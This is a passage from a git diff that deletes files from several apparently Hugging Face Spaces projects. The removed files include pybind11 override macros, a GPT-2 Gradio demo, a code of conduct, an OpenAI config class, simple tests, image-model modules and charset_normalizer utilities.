tstate = PyEval_SaveThread(); - if (disassoc) { - auto key = internals.tstate; - PYBIND11_TLS_DELETE_VALUE(key); - } - } - ~gil_scoped_release() { - if (!tstate) - return; - PyEval_RestoreThread(tstate); - if (disassoc) { - auto key = detail::get_internals().tstate; - PYBIND11_TLS_REPLACE_VALUE(key, tstate); - } - } -private: - PyThreadState *tstate; - bool disassoc; -}; -#elif defined(PYPY_VERSION) -class gil_scoped_acquire { - PyGILState_STATE state; -public: - gil_scoped_acquire() { state = PyGILState_Ensure(); } - ~gil_scoped_acquire() { PyGILState_Release(state); } -}; - -class gil_scoped_release { - PyThreadState *state; -public: - gil_scoped_release() { state = PyEval_SaveThread(); } - ~gil_scoped_release() { PyEval_RestoreThread(state); } -}; -#else -class gil_scoped_acquire { }; -class gil_scoped_release { }; -#endif - -error_already_set::~error_already_set() { - if (m_type) { - gil_scoped_acquire gil; - error_scope scope; - m_type.release().dec_ref(); - m_value.release().dec_ref(); - m_trace.release().dec_ref(); - } -} - -inline function get_type_overload(const void *this_ptr, const detail::type_info *this_type, const char *name) { - handle self = detail::get_object_handle(this_ptr, this_type); - if (!self) - return function(); - handle type = self.get_type(); - auto key = std::make_pair(type.ptr(), name); - - /* Cache functions that aren't overloaded in Python to avoid - many costly Python dictionary lookups below */ - auto &cache = detail::get_internals().inactive_overload_cache; - if (cache.find(key) != cache.end()) - return function(); - - function overload = getattr(self, name, function()); - if (overload.is_cpp_function()) { - cache.insert(key); - return function(); - } - - /* Don't call dispatch code if invoked from overridden function. - Unfortunately this doesn't work on PyPy. */ -#if !defined(PYPY_VERSION) - PyFrameObject *frame = PyThreadState_Get()->frame; - if (frame && (std::string) str(frame->f_code->co_name) == name && - frame->f_code->co_argcount > 0) { - PyFrame_FastToLocals(frame); - PyObject *self_caller = PyDict_GetItem( - frame->f_locals, PyTuple_GET_ITEM(frame->f_code->co_varnames, 0)); - if (self_caller == self.ptr()) - return function(); - } -#else - /* PyPy currently doesn't provide a detailed cpyext emulation of - frame objects, so we have to emulate this using Python. This - is going to be slow..*/ - dict d; d["self"] = self; d["name"] = pybind11::str(name); - PyObject *result = PyRun_String( - "import inspect\n" - "frame = inspect.currentframe()\n" - "if frame is not None:\n" - " frame = frame.f_back\n" - " if frame is not None and str(frame.f_code.co_name) == name and " - "frame.f_code.co_argcount > 0:\n" - " self_caller = frame.f_locals[frame.f_code.co_varnames[0]]\n" - " if self_caller == self:\n" - " self = None\n", - Py_file_input, d.ptr(), d.ptr()); - if (result == nullptr) - throw error_already_set(); - if (d["self"].is_none()) - return function(); - Py_DECREF(result); -#endif - - return overload; -} - -/** \rst - Try to retrieve a python method by the provided name from the instance pointed to by the this_ptr. - - :this_ptr: The pointer to the object the overload should be retrieved for. This should be the first - non-trampoline class encountered in the inheritance chain. - :name: The name of the overloaded Python method to retrieve. - :return: The Python method by this name from the object or an empty function wrapper. - \endrst */ -template function get_overload(const T *this_ptr, const char *name) { - auto tinfo = detail::get_type_info(typeid(T)); - return tinfo ? get_type_overload(this_ptr, tinfo, name) : function(); -} - -#define PYBIND11_OVERLOAD_INT(ret_type, cname, name, ...) { \ - pybind11::gil_scoped_acquire gil; \ - pybind11::function overload = pybind11::get_overload(static_cast(this), name); \ - if (overload) { \ - auto o = overload(__VA_ARGS__); \ - if (pybind11::detail::cast_is_temporary_value_reference::value) { \ - static pybind11::detail::overload_caster_t caster; \ - return pybind11::detail::cast_ref(std::move(o), caster); \ - } \ - else return pybind11::detail::cast_safe(std::move(o)); \ - } \ - } - -/** \rst - Macro to populate the virtual method in the trampoline class. This macro tries to look up a method named 'fn' - from the Python side, deals with the :ref:`gil` and necessary argument conversions to call this method and return - the appropriate type. See :ref:`overriding_virtuals` for more information. This macro should be used when the method - name in C is not the same as the method name in Python. For example with `__str__`. - - .. code-block:: cpp - - std::string toString() override { - PYBIND11_OVERLOAD_NAME( - std::string, // Return type (ret_type) - Animal, // Parent class (cname) - "__str__", // Name of method in Python (name) - toString, // Name of function in C++ (fn) - ); - } -\endrst */ -#define PYBIND11_OVERLOAD_NAME(ret_type, cname, name, fn, ...) \ - PYBIND11_OVERLOAD_INT(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), name, __VA_ARGS__) \ - return cname::fn(__VA_ARGS__) - -/** \rst - Macro for pure virtual functions, this function is identical to :c:macro:`PYBIND11_OVERLOAD_NAME`, except that it - throws if no overload can be found. -\endrst */ -#define PYBIND11_OVERLOAD_PURE_NAME(ret_type, cname, name, fn, ...) \ - PYBIND11_OVERLOAD_INT(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), name, __VA_ARGS__) \ - pybind11::pybind11_fail("Tried to call pure virtual function \"" PYBIND11_STRINGIFY(cname) "::" name "\""); - -/** \rst - Macro to populate the virtual method in the trampoline class. This macro tries to look up the method - from the Python side, deals with the :ref:`gil` and necessary argument conversions to call this method and return - the appropriate type. This macro should be used if the method name in C and in Python are identical. - See :ref:`overriding_virtuals` for more information. - - .. code-block:: cpp - - class PyAnimal : public Animal { - public: - // Inherit the constructors - using Animal::Animal; - - // Trampoline (need one for each virtual function) - std::string go(int n_times) override { - PYBIND11_OVERLOAD_PURE( - std::string, // Return type (ret_type) - Animal, // Parent class (cname) - go, // Name of function in C++ (must match Python name) (fn) - n_times // Argument(s) (...) - ); - } - }; -\endrst */ -#define PYBIND11_OVERLOAD(ret_type, cname, fn, ...) \ - PYBIND11_OVERLOAD_NAME(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), #fn, fn, __VA_ARGS__) - -/** \rst - Macro for pure virtual functions, this function is identical to :c:macro:`PYBIND11_OVERLOAD`, except that it throws - if no overload can be found. -\endrst */ -#define PYBIND11_OVERLOAD_PURE(ret_type, cname, fn, ...) \ - PYBIND11_OVERLOAD_PURE_NAME(PYBIND11_TYPE(ret_type), PYBIND11_TYPE(cname), #fn, fn, __VA_ARGS__) - -PYBIND11_NAMESPACE_END(PYBIND11_NAMESPACE) - -#if defined(_MSC_VER) && !defined(__INTEL_COMPILER) -# pragma warning(pop) -#elif defined(__GNUG__) && !defined(__clang__) -# pragma GCC diagnostic pop -#endif diff --git a/spaces/CVPR/lama-example/saicinpainting/evaluation/masks/__init__.py b/spaces/CVPR/lama-example/saicinpainting/evaluation/masks/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Callimethee/Imagine-CR/app.py b/spaces/Callimethee/Imagine-CR/app.py deleted file mode 100644 index 76f7deaabe05a7abc167c71d5783087b189de24a..0000000000000000000000000000000000000000 --- a/spaces/Callimethee/Imagine-CR/app.py +++ /dev/null @@ -1,29 +0,0 @@ -from transformers import GPT2LMHeadModel, GPT2Tokenizer -import torch -import gradio as gr - -tokenizer = GPT2Tokenizer.from_pretrained("./") -model = GPT2LMHeadModel.from_pretrained("./") - - -def generator(input_string): - input_string = "<|startoftext|>" + " " * (input_string != "") + input_string - prompt = torch.tensor(tokenizer.encode(input_string)).unsqueeze(0) - - generated = model.generate( - prompt, - do_sample=True, - top_k=50, - max_length=1024, - top_p=0.95, - num_return_sequences=5, - ) - out = "" - for tirade in generated: - out += tokenizer.decode(tirade, skip_special_tokens=True) + "\n\n" - return out - -desc = "> Artificial Intelligence, Eh? Sounds fancy - but it'll never replace geniuses such as myself.\n\n - *Huron Stahlmast, Exiled Hupperdook Engineer*\n\n\nThis generator allows you to generate your own transcripts from an imaginary episode of Critical Role! Input the start of a tirade (or nothing!), and let the magic of machine learning do the rest!\n\nFor the curious among you, this uses a fine-tuned version of GPT2." - -demo = gr.Interface(fn=generator, inputs="textbox", outputs="textbox", title="Critical Role Text Generator", examples=[["MATT:"], ["LAURA: I cast"]], description=desc) -demo.launch() diff --git a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md b/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md deleted file mode 100644 index 08b500a221857ec3f451338e80b4a9ab1173a1af..0000000000000000000000000000000000000000 --- a/spaces/Caoyunkang/Segment-Any-Anomaly/SAM/CODE_OF_CONDUCT.md +++ /dev/null @@ -1,80 +0,0 @@ -# Code of Conduct - -## Our Pledge - -In the interest of fostering an open and welcoming environment, we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. - -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or - advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic - address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a - professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. - -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. - -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/Cloudyy/bark-voice-cloning/hubert/__init__.py b/spaces/Cloudyy/bark-voice-cloning/hubert/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/CognitiveLabs/Research-Assistant/config/config.py b/spaces/CognitiveLabs/Research-Assistant/config/config.py deleted file mode 100644 index 97f1d2190585b966e70d5280d968330cd5aec932..0000000000000000000000000000000000000000 --- a/spaces/CognitiveLabs/Research-Assistant/config/config.py +++ /dev/null @@ -1,82 +0,0 @@ -"""Configuration class to store the state of bools for different scripts access.""" -import os - -import openai -from colorama import Fore -from dotenv import load_dotenv - -from config.singleton import Singleton - -load_dotenv(verbose=True) - - -class Config(metaclass=Singleton): - """ - Configuration class to store the state of bools for different scripts access. - """ - - def __init__(self) -> None: - """Initialize the Config class""" - self.debug_mode = False - self.allow_downloads = False - - self.selenium_web_browser = os.getenv("USE_WEB_BROWSER", "chrome") - self.fast_llm_model = os.getenv("FAST_LLM_MODEL", "gpt-3.5-turbo") - self.smart_llm_model = os.getenv("SMART_LLM_MODEL", "gpt-4") - self.fast_token_limit = int(os.getenv("FAST_TOKEN_LIMIT", 8000)) - self.smart_token_limit = int(os.getenv("SMART_TOKEN_LIMIT", 8000)) - self.browse_chunk_max_length = int(os.getenv("BROWSE_CHUNK_MAX_LENGTH", 8192)) - - self.openai_api_key = os.getenv("OPENAI_API_KEY") - self.openai_api_base = os.getenv("OPENAI_API_BASE", openai.api_base) - self.temperature = float(os.getenv("TEMPERATURE", "1")) - - self.user_agent = os.getenv( - "USER_AGENT", - "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36" - " (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36", - ) - - self.memory_backend = os.getenv("MEMORY_BACKEND", "local") - # Initialize the OpenAI API client - openai.api_key = self.openai_api_key - - def set_fast_llm_model(self, value: str) -> None: - """Set the fast LLM model value.""" - self.fast_llm_model = value - - def set_smart_llm_model(self, value: str) -> None: - """Set the smart LLM model value.""" - self.smart_llm_model = value - - def set_fast_token_limit(self, value: int) -> None: - """Set the fast token limit value.""" - self.fast_token_limit = value - - def set_smart_token_limit(self, value: int) -> None: - """Set the smart token limit value.""" - self.smart_token_limit = value - - def set_browse_chunk_max_length(self, value: int) -> None: - """Set the browse_website command chunk max length value.""" - self.browse_chunk_max_length = value - - def set_openai_api_key(self, value: str) -> None: - """Set the OpenAI API key value.""" - self.openai_api_key = value - - def set_debug_mode(self, value: bool) -> None: - """Set the debug mode value.""" - self.debug_mode = value - - -def check_openai_api_key() -> None: - """Check if the OpenAI API key is set in config.py or as an environment variable.""" - cfg = Config() - if not cfg.openai_api_key: - print( - Fore.RED - + "Please set your OpenAI API key in .env or as an environment variable." - ) - print("You can get your key from https://platform.openai.com/account/api-keys") - exit(1) diff --git a/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py b/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py deleted file mode 100644 index 547434b5d97d9a931cac6a05630e147b1924dc05..0000000000000000000000000000000000000000 --- a/spaces/CoreyMorris/MMLU-by-task-Leaderboard/test_paths.py +++ /dev/null @@ -1,19 +0,0 @@ -import unittest -import os - -class TestPaths(unittest.TestCase): - def test_path_exists(self): - # test that the path results exists - self.assertTrue(os.path.exists('results')) - - def test_results_directory_is_not_empty(self): - # test that the results directory is not empty - self.assertGreater(len(os.listdir('results')), 0) - - def test_results_contain_json_files(self): - # test that the results director contains json files in the sub directores - # get a list of all the subdirectories - subdirectories = [x[0] for x in os.walk('results')] - # check if the subdirectories contain json files. only check one subdirectory - subdirectory = subdirectories[1] - self.assertGreater(len(os.listdir(subdirectory)), 0) \ No newline at end of file diff --git a/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py b/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py deleted file mode 100644 index 5b60ceb2349e3bd7900ff325740e2022d2903b1c..0000000000000000000000000000000000000000 --- a/spaces/CrucibleAI/ControlNetMediaPipeFaceSD21/ldm/data/util.py +++ /dev/null @@ -1,24 +0,0 @@ -import torch - -from ldm.modules.midas.api import load_midas_transform - - -class AddMiDaS(object): - def __init__(self, model_type): - super().__init__() - self.transform = load_midas_transform(model_type) - - def pt2np(self, x): - x = ((x + 1.0) * .5).detach().cpu().numpy() - return x - - def np2pt(self, x): - x = torch.from_numpy(x) * 2 - 1. - return x - - def __call__(self, sample): - # sample['jpg'] is tensor hwc in [-1, 1] at this point - x = self.pt2np(sample['jpg']) - x = self.transform({"image": x})["image"] - sample['midas_in'] = x - return sample \ No newline at end of file diff --git a/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py b/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py deleted file mode 100644 index 4b66ab1226d6793de846bc9828bbe427031a0e2d..0000000000000000000000000000000000000000 --- a/spaces/Cvandi/remake/realesrgan/archs/discriminator_arch.py +++ /dev/null @@ -1,67 +0,0 @@ -from basicsr.utils.registry import ARCH_REGISTRY -from torch import nn as nn -from torch.nn import functional as F -from torch.nn.utils import spectral_norm - - -@ARCH_REGISTRY.register() -class UNetDiscriminatorSN(nn.Module): - """Defines a U-Net discriminator with spectral normalization (SN) - - It is used in Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. - - Arg: - num_in_ch (int): Channel number of inputs. Default: 3. - num_feat (int): Channel number of base intermediate features. Default: 64. - skip_connection (bool): Whether to use skip connections between U-Net. Default: True. - """ - - def __init__(self, num_in_ch, num_feat=64, skip_connection=True): - super(UNetDiscriminatorSN, self).__init__() - self.skip_connection = skip_connection - norm = spectral_norm - # the first convolution - self.conv0 = nn.Conv2d(num_in_ch, num_feat, kernel_size=3, stride=1, padding=1) - # downsample - self.conv1 = norm(nn.Conv2d(num_feat, num_feat * 2, 4, 2, 1, bias=False)) - self.conv2 = norm(nn.Conv2d(num_feat * 2, num_feat * 4, 4, 2, 1, bias=False)) - self.conv3 = norm(nn.Conv2d(num_feat * 4, num_feat * 8, 4, 2, 1, bias=False)) - # upsample - self.conv4 = norm(nn.Conv2d(num_feat * 8, num_feat * 4, 3, 1, 1, bias=False)) - self.conv5 = norm(nn.Conv2d(num_feat * 4, num_feat * 2, 3, 1, 1, bias=False)) - self.conv6 = norm(nn.Conv2d(num_feat * 2, num_feat, 3, 1, 1, bias=False)) - # extra convolutions - self.conv7 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) - self.conv8 = norm(nn.Conv2d(num_feat, num_feat, 3, 1, 1, bias=False)) - self.conv9 = nn.Conv2d(num_feat, 1, 3, 1, 1) - - def forward(self, x): - # downsample - x0 = F.leaky_relu(self.conv0(x), negative_slope=0.2, inplace=True) - x1 = F.leaky_relu(self.conv1(x0), negative_slope=0.2, inplace=True) - x2 = F.leaky_relu(self.conv2(x1), negative_slope=0.2, inplace=True) - x3 = F.leaky_relu(self.conv3(x2), negative_slope=0.2, inplace=True) - - # upsample - x3 = F.interpolate(x3, scale_factor=2, mode='bilinear', align_corners=False) - x4 = F.leaky_relu(self.conv4(x3), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x4 = x4 + x2 - x4 = F.interpolate(x4, scale_factor=2, mode='bilinear', align_corners=False) - x5 = F.leaky_relu(self.conv5(x4), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x5 = x5 + x1 - x5 = F.interpolate(x5, scale_factor=2, mode='bilinear', align_corners=False) - x6 = F.leaky_relu(self.conv6(x5), negative_slope=0.2, inplace=True) - - if self.skip_connection: - x6 = x6 + x0 - - # extra convolutions - out = F.leaky_relu(self.conv7(x6), negative_slope=0.2, inplace=True) - out = F.leaky_relu(self.conv8(out), negative_slope=0.2, inplace=True) - out = self.conv9(out) - - return out diff --git a/spaces/DAMO-NLP-SG/Video-LLaMA/README.md b/spaces/DAMO-NLP-SG/Video-LLaMA/README.md deleted file mode 100644 index 7e48edc1fcbd340725978ff41afa3ebd192d1db5..0000000000000000000000000000000000000000 --- a/spaces/DAMO-NLP-SG/Video-LLaMA/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: Video LLaMA -emoji: 🚀 -colorFrom: purple -colorTo: gray -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - diff --git a/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md b/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md deleted file mode 100644 index 0993b27a77b69db8c6c13721e06c15ef5c1b756d..0000000000000000000000000000000000000000 --- a/spaces/DHEIVER/timeseries-anomaly-detection-autoencoders/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Timeseries Anomaly Detection -emoji: 🌍 -colorFrom: blue -colorTo: indigo -sdk: gradio -sdk_version: 3.0.1 -app_file: app.py -pinned: false -duplicated_from: keras-io/timeseries-anomaly-detection-autoencoders ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py deleted file mode 100644 index bf2767a0e6022c52690cdabf684b0b676ed0eadc..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/charset_normalizer/utils.py +++ /dev/null @@ -1,414 +0,0 @@ -import importlib -import logging -import unicodedata -from codecs import IncrementalDecoder -from encodings.aliases import aliases -from functools import lru_cache -from re import findall -from typing import Generator, List, Optional, Set, Tuple, Union - -from _multibytecodec import MultibyteIncrementalDecoder - -from .constant import ( - ENCODING_MARKS, - IANA_SUPPORTED_SIMILAR, - RE_POSSIBLE_ENCODING_INDICATION, - UNICODE_RANGES_COMBINED, - UNICODE_SECONDARY_RANGE_KEYWORD, - UTF8_MAXIMAL_ALLOCATION, -) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_accentuated(character: str) -> bool: - try: - description: str = unicodedata.name(character) - except ValueError: - return False - return ( - "WITH GRAVE" in description - or "WITH ACUTE" in description - or "WITH CEDILLA" in description - or "WITH DIAERESIS" in description - or "WITH CIRCUMFLEX" in description - or "WITH TILDE" in description - ) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def remove_accent(character: str) -> str: - decomposed: str = unicodedata.decomposition(character) - if not decomposed: - return character - - codes: List[str] = decomposed.split(" ") - - return chr(int(codes[0], 16)) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def unicode_range(character: str) -> Optional[str]: - """ - Retrieve the Unicode range official name from a single character. - """ - character_ord: int = ord(character) - - for range_name, ord_range in UNICODE_RANGES_COMBINED.items(): - if character_ord in ord_range: - return range_name - - return None - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_latin(character: str) -> bool: - try: - description: str = unicodedata.name(character) - except ValueError: - return False - return "LATIN" in description - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_ascii(character: str) -> bool: - try: - character.encode("ascii") - except UnicodeEncodeError: - return False - return True - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_punctuation(character: str) -> bool: - character_category: str = unicodedata.category(character) - - if "P" in character_category: - return True - - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Punctuation" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_symbol(character: str) -> bool: - character_category: str = unicodedata.category(character) - - if "S" in character_category or "N" in character_category: - return True - - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Forms" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_emoticon(character: str) -> bool: - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - return False - - return "Emoticons" in character_range - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_separator(character: str) -> bool: - if character.isspace() or character in {"|", "+", "<", ">"}: - return True - - character_category: str = unicodedata.category(character) - - return "Z" in character_category or character_category in {"Po", "Pd", "Pc"} - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_case_variable(character: str) -> bool: - return character.islower() != character.isupper() - - -def is_private_use_only(character: str) -> bool: - character_category: str = unicodedata.category(character) - - return character_category == "Co" - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_cjk(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "CJK" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_hiragana(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "HIRAGANA" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_katakana(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "KATAKANA" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_hangul(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "HANGUL" in character_name - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_thai(character: str) -> bool: - try: - character_name = unicodedata.name(character) - except ValueError: - return False - - return "THAI" in character_name - - -@lru_cache(maxsize=len(UNICODE_RANGES_COMBINED)) -def is_unicode_range_secondary(range_name: str) -> bool: - return any(keyword in range_name for keyword in UNICODE_SECONDARY_RANGE_KEYWORD) - - -@lru_cache(maxsize=UTF8_MAXIMAL_ALLOCATION) -def is_unprintable(character: str) -> bool: - return ( - character.isspace() is False # includes \n \t \r \v - and character.isprintable() is False - and character != "\x1A" # Why? Its the ASCII substitute character. - and character != "\ufeff" # bug discovered in Python, - # Zero Width No-Break Space located in Arabic Presentation Forms-B, Unicode 1.1 not acknowledged as space. - ) - - -def any_specified_encoding(sequence: bytes, search_zone: int = 4096) -> Optional[str]: - """ - Extract using ASCII-only decoder any specified encoding in the first n-bytes. - """ - if not isinstance(sequence, bytes): - raise TypeError - - seq_len: int = len(sequence) - - results: List[str] = findall( - RE_POSSIBLE_ENCODING_INDICATION, - sequence[: min(seq_len, search_zone)].decode("ascii", errors="ignore"), - ) - - if len(results) == 0: - return None - - for specified_encoding in results: - specified_encoding = specified_encoding.lower().replace("-", "_") - - encoding_alias: str - encoding_iana: str - - for encoding_alias, encoding_iana in aliases.items(): - if encoding_alias == specified_encoding: - return encoding_iana - if encoding_iana == specified_encoding: - return encoding_iana - - return None - - -@lru_cache(maxsize=128) -def is_multi_byte_encoding(name: str) -> bool: - """ - Verify is a specific encoding is a multi byte one based on it IANA name - """ - return name in { - "utf_8", - "utf_8_sig", - "utf_16", - "utf_16_be", - "utf_16_le", - "utf_32", - "utf_32_le", - "utf_32_be", - "utf_7", - } or issubclass( - importlib.import_module("encodings.{}".format(name)).IncrementalDecoder, - MultibyteIncrementalDecoder, - ) - - -def identify_sig_or_bom(sequence: bytes) -> Tuple[Optional[str], bytes]: - """ - Identify and extract SIG/BOM in given sequence. - """ - - for iana_encoding in ENCODING_MARKS: - marks: Union[bytes, List[bytes]] = ENCODING_MARKS[iana_encoding] - - if isinstance(marks, bytes): - marks = [marks] - - for mark in marks: - if sequence.startswith(mark): - return iana_encoding, mark - - return None, b"" - - -def should_strip_sig_or_bom(iana_encoding: str) -> bool: - return iana_encoding not in {"utf_16", "utf_32"} - - -def iana_name(cp_name: str, strict: bool = True) -> str: - cp_name = cp_name.lower().replace("-", "_") - - encoding_alias: str - encoding_iana: str - - for encoding_alias, encoding_iana in aliases.items(): - if cp_name in [encoding_alias, encoding_iana]: - return encoding_iana - - if strict: - raise ValueError("Unable to retrieve IANA for '{}'".format(cp_name)) - - return cp_name - - -def range_scan(decoded_sequence: str) -> List[str]: - ranges: Set[str] = set() - - for character in decoded_sequence: - character_range: Optional[str] = unicode_range(character) - - if character_range is None: - continue - - ranges.add(character_range) - - return list(ranges) - - -def cp_similarity(iana_name_a: str, iana_name_b: str) -> float: - if is_multi_byte_encoding(iana_name_a) or is_multi_byte_encoding(iana_name_b): - return 0.0 - - decoder_a = importlib.import_module( - "encodings.{}".format(iana_name_a) - ).IncrementalDecoder - decoder_b = importlib.import_module( - "encodings.{}".format(iana_name_b) - ).IncrementalDecoder - - id_a: IncrementalDecoder = decoder_a(errors="ignore") - id_b: IncrementalDecoder = decoder_b(errors="ignore") - - character_match_count: int = 0 - - for i in range(255): - to_be_decoded: bytes = bytes([i]) - if id_a.decode(to_be_decoded) == id_b.decode(to_be_decoded): - character_match_count += 1 - - return character_match_count / 254 - - -def is_cp_similar(iana_name_a: str, iana_name_b: str) -> bool: - """ - Determine if two code page are at least 80% similar. IANA_SUPPORTED_SIMILAR dict was generated using - the function cp_similarity. - """ - return ( - iana_name_a in IANA_SUPPORTED_SIMILAR - and iana_name_b in IANA_SUPPORTED_SIMILAR[iana_name_a] - ) - - -def set_logging_handler( - name: str = "charset_normalizer", - level: int = logging.INFO, - format_string: str = "%(asctime)s | %(levelname)s | %(message)s", -) -> None: - logger = logging.getLogger(name) - logger.setLevel(level) - - handler = logging.StreamHandler() - handler.setFormatter(logging.Formatter(format_string)) - logger.addHandler(handler) - - -def cut_sequence_chunks( - sequences: bytes, - encoding_iana: str, - offsets: range, - chunk_size: int, - bom_or_sig_available: bool, - strip_sig_or_bom: bool, - sig_payload: bytes, - is_multi_byte_decoder: bool, - decoded_payload: Optional[str] = None, -) -> Generator[str, None, None]: - if decoded_payload and is_multi_byte_decoder is False: - for i in offsets: - chunk = decoded_payload[i : i + chunk_size] - if not chunk: - break - yield chunk - else: - for i in offsets: - chunk_end = i + chunk_size - if chunk_end > len(sequences) + 8: - continue - - cut_sequence = sequences[i : i + chunk_size] - - if bom_or_sig_available and strip_sig_or_bom is False: - cut_sequence = sig_payload + cut_sequence - - chunk = cut_sequence.decode( - encoding_iana, - errors="ignore" if is_multi_byte_decoder else "strict", - ) - - # multi-byte bad cutting detector and adjustment - # not the cleanest way to perform that fix but clever enough for now. - if is_multi_byte_decoder and i > 0: - chunk_partial_size_chk: int = min(chunk_size, 16) - - if ( - decoded_payload - and chunk[:chunk_partial_size_chk] not in decoded_payload - ): - for j in range(i, i - 4, -1): - cut_sequence = sequences[j:chunk_end] - - if bom_or_sig_available and strip_sig_or_bom is False: - cut_sequence = sig_payload + cut_sequence - - chunk = cut_sequence.decode(encoding_iana, errors="ignore") - - if chunk[:chunk_partial_size_chk] in decoded_payload: - break - - yield chunk diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py deleted file mode 100644 index 267d64ce8aee9eaf5462d9cbd47deca44cfdef28..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/fastapi/utils.py +++ /dev/null @@ -1,228 +0,0 @@ -import re -import warnings -from dataclasses import is_dataclass -from typing import ( - TYPE_CHECKING, - Any, - Dict, - MutableMapping, - Optional, - Set, - Type, - Union, - cast, -) -from weakref import WeakKeyDictionary - -import fastapi -from fastapi._compat import ( - PYDANTIC_V2, - 